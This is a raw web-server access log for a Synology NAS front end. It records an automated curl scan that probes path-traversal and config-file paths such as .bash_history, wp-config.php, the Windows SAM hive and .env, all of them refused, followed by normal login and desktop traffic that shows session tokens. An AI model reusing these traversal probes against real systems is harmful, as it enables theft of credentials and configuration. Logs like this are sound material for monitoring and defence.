+[21/Jan/2026:01:25:54 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252froot/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/includes/database.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/android/debug.keystore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/nft/metadata_template.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postfix/master.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/internal/config/metadata.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/conf/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:54 +0000] - 404 404 - GET https nas.profibot.hu "/config.php~" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/tmp/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/shop/api/schema.graphql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/groundstation/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/admin_dev/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/config/firewall.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/api/exec" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/modbus/settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/openai/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/biosensor/sampling.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/vcpkg.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/usr/local/etc/Caddyfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/saml/idp.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/zc_admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/finance/ledger_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/verifone/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:55 +0000] - 404 404 - GET https nas.profibot.hu "/tflite/model_settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js" [Client 204.76.203.25] [Length 1658] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js" [Client 204.76.203.25] [Length 23582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js" [Client 204.76.203.25] [Length 2013] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js" [Client 204.76.203.25] [Length 68654] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js" [Client 204.76.203.25] [Length 28266] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js" [Client 204.76.203.25] [Length 51641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js" [Client 204.76.203.25] [Length 61046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js" [Client 204.76.203.25] [Length 100511] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:07:34:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js" [Client 204.76.203.25] [Length 152247] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[22/Jan/2026:05:01:19 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.254.106.197] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:20 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/sencha-touch-2.4.1/resources/css/cupertino.css?v=42962" [Client 84.254.106.197] [Length 69221] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 404 404 - GET https nas.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=42962" [Client 84.254.106.197] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 404 404 - GET https nas.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=42962&SynoToken=" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 404 404 - GET https nas.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/sencha-touch-2.4.1/touch.js?v=42962" [Client 84.254.106.197] [Length 199829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/mobile/ui/mobile.js?v=42962" [Client 84.254.106.197] [Length 121291] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/mobile/ui/style.css?v=42962" [Client 84.254.106.197] [Length 11144] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=42962" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:05:01:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:10:50:57 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:50:58 +0000] - 304 304 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:50:58 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:50:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 69] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 334] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3334] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&SynoToken=X741WRjetYUzc&v=1768242326" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769079077489&SynoToken=X741WRjetYUzc&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5259] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 108999] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=X741WRjetYUzc&UserType=user&EIO=3&transport=polling&t=PlbL7lp" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SynologyAccount/SynologyAccount.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1069] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=X741WRjetYUzc&UserType=user&EIO=3&transport=polling&t=PlbL7mi&sid=7FRUJXOi5MdHWhh6AAAG" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/WelcomeApp.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 21702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=X741WRjetYUzc&UserType=user&EIO=3&transport=polling&t=PlbL7nl&sid=7FRUJXOi5MdHWhh6AAAG" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.BackgroundTask" [Client 84.1.26.27] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/PromotionApp.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 5534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.EW.Info" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=X741WRjetYUzc&UserType=user&EIO=3&transport=polling&t=PlbL7nl.0&sid=7FRUJXOi5MdHWhh6AAAG" [Client 84.1.26.27] [Length 3] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpUtils.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LoginNotify/LoginNotify.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/ResetAdminApp.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/Main.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 8820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpBrowser.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 14796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/MainVue.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 16917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/external_device_util.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 500] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/circleGradient.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 